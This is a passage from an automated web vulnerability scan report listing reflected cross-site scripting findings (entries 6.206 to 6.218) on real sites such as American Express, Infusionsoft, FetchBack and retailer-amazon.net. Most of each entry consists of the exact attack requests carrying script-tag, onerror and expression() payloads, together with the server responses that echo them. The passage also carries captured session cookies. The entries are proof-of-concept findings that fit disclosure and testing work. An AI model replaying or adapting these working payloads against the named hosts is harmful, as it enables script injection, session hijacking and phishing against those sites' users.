Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303653223.1303658380.5; __utmc=221607367; __utmb=221607367.1.10.1303658380

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2157

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<iMg src=N onerror=netsparker(9)>f5010<img src=a onerror=alert(1)>245c1d7e61aController</strong>
...[SNIP]...

6.206. https://online.americanexpress.com/myca/logon/us/action [DestPage parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://online.americanexpress.com
Path:   /myca/logon/us/action

Issue detail

The value of the DestPage request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 81294%20a%3dbc58b4f6d9f9 was submitted in the DestPage parameter. This input was echoed as 81294 a=bc58b4f6d9f9 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /myca/logon/us/action?request_type=LogonHandler&Face=en_US&DestPage=81294%20a%3dbc58b4f6d9f9&Face=en_US HTTP/1.1
Host: online.americanexpress.com
Connection: keep-alive
Referer: http://landing.americanexpress.com/v2.php?type=v2&gclid=CNqttZH1tagCFQbe4AodEirYCA&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1303676103708679

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:29:43 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Expires: Sun, 24 Apr 2011 20:29:43 GMT
LastModified: Sun, 24 Apr 2011 20:29:43 GMT
Set-Cookie: NSC_nf3-x-vt-mphpo-c=ffffffff97a3d1e545525d5f4f58455e445a4a4299f9;Version=1;path=/
Keep-Alive: timeout=15, max=54
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: sroute=957221386.58148.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 64345


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd">
<html xmlns="_http://www.w3.org/1999/xhtml" lang="en" xml:lang="e
...[SNIP]...
<input id="acctSelectionHiddenFieldURL" type="hidden" name="acctSelectedURL" value=81294 a=bc58b4f6d9f9/>
...[SNIP]...

6.207. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/371/CD1/id4+106163471

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c3ca</script><script>alert(1)</script>8a921d8d37a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /z/371/CD1/id4+1061634715c3ca</script><script>alert(1)</script>8a921d8d37a HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:24:10 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=5932ae843e7b4a5cd3e96139679c6367; expires=Mon, 25-Apr-2011 03:24:10 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=5932ae843e7b4a5cd3e96139679c6367; expires=Tue, 24-May-2011 03:24:10 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=5932ae843e7b4a5cd3e96139679c6367; expires=Tue, 24-May-2011 03:24:10 GMT; path=/; domain=.directtrack.com
X-Server-Name: www@dc1dtweb146
Content-Length: 577
Content-Type: text/html

<html><head><meta http-equiv="refresh" content="0;url=http://affiliate.idgtracker.com/rd/r.php?sid=13&pub=300009&c1=id4 1061634715c3ca</script><script>alert(1)</script>8a921d8d37aCD1&c2=CD1">
<script type="text/javascript">function redirect() {if(document.cookie == ''){location.href="http://affiliate.idgtracker.com/rd/r.php?sid=13&pub=300009&c1=id4 1061634715c3ca</script><script>alert(1)</script>8a921d8d37aCD1&c2=CD1";}}</script>
...[SNIP]...

6.208. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/371/CD1/id4+106163471

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2e01"><script>alert(1)</script>0f82d394dbd was submitted in the REST URL parameter 4. This input was echoed as a2e01\"><script>alert(1)</script>0f82d394dbd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /z/371/CD1/id4+106163471a2e01"><script>alert(1)</script>0f82d394dbd HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:24:05 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=94a53209cc67f8af3f6833eb0646d02a; expires=Mon, 25-Apr-2011 03:24:05 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=94a53209cc67f8af3f6833eb0646d02a; expires=Tue, 24-May-2011 03:24:05 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=94a53209cc67f8af3f6833eb0646d02a; expires=Tue, 24-May-2011 03:24:05 GMT; path=/; domain=.directtrack.com
X-Server-Name: www@dc1dtweb130
Content-Length: 565
Content-Type: text/html

<html><head><meta http-equiv="refresh" content="0;url=http://affiliate.idgtracker.com/rd/r.php?sid=13&pub=300009&c1=id4 106163471a2e01\"><script>alert(1)</script>0f82d394dbdCD1&c2=CD1">
<script type="
...[SNIP]...

6.209. http://pixel.fetchback.com/serve/fb/pdc [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload dbfe5<x%20style%3dx%3aexpression(alert(1))>eaccacc8778 was submitted in the name parameter. This input was echoed as dbfe5<x style=x:expression(alert(1))>eaccacc8778 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landingdbfe5<x%20style%3dx%3aexpression(alert(1))>eaccacc8778&sid=2451 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.reputationmanagementconsultants.com/?utm_source=google&utm_medium=cpc&utm_term=keyword&utm_content=search&utm_campaign=RM&gclid=COXtr8e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303533727_1660:354055; uid=1_1303533727_1303179323923:6792170478871670; kwd=1_1303533727; sit=1_1303533727_3236:118:0_782:354404:354055; cre=1_1303533727; bpd=1_1303533727; apd=1_1303533727; scg=1_1303533727; ppd=1_1303533727; afl=1_1303533727

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:33:00 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303691580_1660:511908; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:33:00 GMT; Path=/
Set-Cookie: uid=1_1303691580_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:33:00 GMT; Path=/
Set-Cookie: kwd=1_1303691580; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:33:00 GMT; Path=/
Set-Cookie: sit=1_1303691580_3236:157971:157853_782:512257:511908; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:33:00 GMT; Path=/
Set-Cookie: cre=1_1303691580; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:33:00 GMT; Path=/
Set-Cookie: bpd=1_1303691580; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:33:00 GMT; Path=/
Set-Cookie: apd=1_1303691580; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:33:00 GMT; Path=/
Set-Cookie: scg=1_1303691580; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:33:00 GMT; Path=/
Set-Cookie: ppd=1_1303691580; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:33:00 GMT; Path=/
Set-Cookie: afl=1_1303691580; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 00:33:00 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 00:33:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

<!-- campaign : 'landingdbfe5<x style=x:expression(alert(1))>eaccacc8778' *not* found -->

6.210. https://psr.infusionsoft.com/InAppHelp/popUpCenter.jsp [pageName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://psr.infusionsoft.com
Path:   /InAppHelp/popUpCenter.jsp

Issue detail

The value of the pageName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6a7c"%3balert(1)//9bf16d294b9 was submitted in the pageName parameter. This input was echoed as e6a7c";alert(1)//9bf16d294b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /InAppHelp/popUpCenter.jsp?pageName=e6a7c"%3balert(1)//9bf16d294b9 HTTP/1.1
Host: psr.infusionsoft.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1D05F63F025804F51DC0C60D07CE712E; SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.6.10.1303693620

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 01:40:45 GMT
Content-Length: 11617


<!-- This TAG MUST COME FIRST, or else IE will ignore it -->
<meta http-equiv="X-UA-Compatible" content="IE=7.5"/>


<link rel="shortcut icon" href="/slices/style/favicon.ico" type="i
...[SNIP]...
").val(query).css("color", "black");
} else {
// get page related set of articles
Infusion.Component.Inapphelp.getHelpStreamContent("e6a7c";alert(1)//9bf16d294b9", "", "iah-related-articles", "getRelatedArticles", helpstreamBaseURI, helpstreamGotoURI, window.location.pathname);
Infusion.Component.Inapphelp.getHelpStreamContent("e6a7c";a
...[SNIP]...

6.211. https://psr.infusionsoft.com/InAppHelp/popUpCenter.jsp [pageName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://psr.infusionsoft.com
Path:   /InAppHelp/popUpCenter.jsp

Issue detail

The value of the pageName request parameter is copied into the HTML document as plain text between tags. The payload 7e8a3<script>alert(1)</script>0f58f340202 was submitted in the pageName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /InAppHelp/popUpCenter.jsp?pageName=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000409)%3C/script%3E7e8a3<script>alert(1)</script>0f58f340202 HTTP/1.1
Host: psr.infusionsoft.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1D05F63F025804F51DC0C60D07CE712E; SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.6.10.1303693620

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 01:40:46 GMT
Content-Length: 11761


<!-- This TAG MUST COME FIRST, or else IE will ignore it -->
<meta http-equiv="X-UA-Compatible" content="IE=7.5"/>


<link rel="shortcut icon" href="/slices/style/favicon.ico" type="i
...[SNIP]...
</script>7e8a3<script>alert(1)</script>0f58f340202", "", "iah-related-articles", "getRelatedArticles", helpstreamBaseURI, helpstreamGotoURI, window.location.pathname);
Infusion.Component.Inapphelp.getHelpStreamContent("'"-->
...[SNIP]...

6.212. https://psr.infusionsoft.com/template/divFiller.jsp [divName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://psr.infusionsoft.com
Path:   /template/divFiller.jsp

Issue detail

The value of the divName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1ff2"%3balert(1)//6f94d57a2e2 was submitted in the divName parameter. This input was echoed as a1ff2";alert(1)//6f94d57a2e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /template/divFiller.jsp?divName=a1ff2"%3balert(1)//6f94d57a2e2 HTTP/1.1
Host: psr.infusionsoft.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1D05F63F025804F51DC0C60D07CE712E; SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.6.10.1303693620

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 01:40:45 GMT
Content-Length: 580

<!-- Headers to prevent the caching of pages -->
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7.5" >
       <meta http-equiv="pragma" content="no-cache">
       <meta http-equiv="cache-contr
...[SNIP]...
<script>
   try {
       var remoteDiv = window.parent.document.getElementById("a1ff2";alert(1)//6f94d57a2e2");
       var thisDiv = document.getElementById("tmp");
       remoteDiv.innerHTML = thisDiv.innerHTML;
   } catch(error){
//        alert(error.message);
   }
</script>
...[SNIP]...

6.213. https://psr.infusionsoft.com/template/divFiller.jsp [divName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://psr.infusionsoft.com
Path:   /template/divFiller.jsp

Issue detail

The value of the divName request parameter is copied into the HTML document as plain text between tags. The payload ca3ca<script>alert(1)</script>ae82c8ed986 was submitted in the divName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /template/divFiller.jsp?divName=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0006FA)%3C/script%3Eca3ca<script>alert(1)</script>ae82c8ed986 HTTP/1.1
Host: psr.infusionsoft.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1D05F63F025804F51DC0C60D07CE712E; SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.6.10.1303693620

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 01:40:46 GMT
Content-Length: 652

<!-- Headers to prevent the caching of pages -->
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7.5" >
       <meta http-equiv="pragma" content="no-cache">
       <meta http-equiv="cache-contr
...[SNIP]...
</script>ca3ca<script>alert(1)</script>ae82c8ed986");
       var thisDiv = document.getElementById("tmp");
       remoteDiv.innerHTML = thisDiv.innerHTML;
   } catch(error){
//        alert(error.message);
   }
</script>
...[SNIP]...

6.214. http://pub.retailer-amazon.net/banner_120_600_a.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_120_600_a.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6d4b"><img%20src%3da%20onerror%3dalert(1)>1a348cd60ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a6d4b"><img src=a onerror=alert(1)>1a348cd60ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /banner_120_600_a.php?search={$keyw/a6d4b"><img%20src%3da%20onerror%3dalert(1)>1a348cd60acord} HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 620


<html>
<head>
<title> {$keywa6d4b"><img src=a onerror=alert(1)>1a348cd60acord} </title>
<meta name="description" content="{$keywa6d4b"><img src=a onerror=alert(1)>1a348cd60acord}">
<meta name="keywor
...[SNIP]...

6.215. http://pub.retailer-amazon.net/banner_120_600_a.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_120_600_a.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96112"><img%20src%3da%20onerror%3dalert(1)>e97eff3a4a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 96112"><img src=a onerror=alert(1)>e97eff3a4a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /banner_120_600_a.php?search={$keyw/96112"><img%20src%3da%20onerror%3dalert(1)>e97eff3a4a8ord} HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 620


<html>
<head>
<title> {$keyw96112"><img src=a onerror=alert(1)>e97eff3a4a8ord} </title>
<meta name="description" content="{$keyw96112"><img src=a onerror=alert(1)>e97eff3a4a8ord}">
<meta name="keywor
...[SNIP]...
<iframe name="I1" src="banner_120_600_b.php?search={$keyw96112"><img src=a onerror=alert(1)>e97eff3a4a8ord}" marginwidth="1" marginheight="1" height="600" width="160" scrolling="no" border="0" frameborder="0">
...[SNIP]...

6.216. http://pub.retailer-amazon.net/banner_120_600_a.php [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_120_600_a.php

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44577"><img%20src%3da%20onerror%3dalert(1)>4b902301784 was submitted in the search parameter. This input was echoed as 44577"><img src=a onerror=alert(1)>4b902301784 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /banner_120_600_a.php?search=44577"><img%20src%3da%20onerror%3dalert(1)>4b902301784 HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 580


<html>
<head>
<title> 44577"><img src=a onerror=alert(1)>4b902301784 </title>
<meta name="description" content="44577"><img src=a onerror=alert(1)>4b902301784">
<meta name="keywords" content="44577">
...[SNIP]...
<iframe name="I1" src="banner_120_600_b.php?search=44577"><img src=a onerror=alert(1)>4b902301784" marginwidth="1" marginheight="1" height="600" width="160" scrolling="no" border="0" frameborder="0">
...[SNIP]...

6.217. http://pub.retailer-amazon.net/banner_120_600_a.php [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_120_600_a.php

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29fc5"><img%20src%3da%20onerror%3dalert(1)>575b178e83c was submitted in the search parameter. This input was echoed as 29fc5"><img src=a onerror=alert(1)>575b178e83c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /banner_120_600_a.php?search={$keyword}29fc5"><img%20src%3da%20onerror%3dalert(1)>575b178e83c HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 620


<html>
<head>
<title> {$keyword}29fc5"><img src=a onerror=alert(1)>575b178e83c </title>
<meta name="description" content="{$keyword}29fc5"><img src=a onerror=alert(1)>575b178e83c">
<meta name="keywor
...[SNIP]...

6.218. http://pub.retailer-amazon.net/banner_728_90_a.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_728_90_a.php

Issue detail

